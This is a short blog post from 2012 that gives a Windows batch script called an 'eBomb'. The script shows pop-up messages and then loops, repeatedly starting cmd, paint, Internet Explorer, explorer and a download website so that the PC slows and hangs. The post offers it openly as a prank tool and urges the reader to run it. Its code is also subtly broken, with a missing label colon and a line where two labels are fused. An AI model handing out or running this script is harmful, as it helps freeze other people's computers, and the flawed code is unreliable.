Search This Blog

Saturday, March 3, 2012

How To Create an eBomb

1. Click on Start-> Run -> NotePad.
2. Copy the following code.

@echo off
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls


begin
goto %random%

:1
start cmd.exe
goto begin

:2
start paint.exe
goto begin

:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe "www.13downloads.com"
goto begin
3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat

 Note:
 This filename.bat makes your pc slow because the above program code is to open multiple process at at time so that it make your pc hang.

No comments:

Post a Comment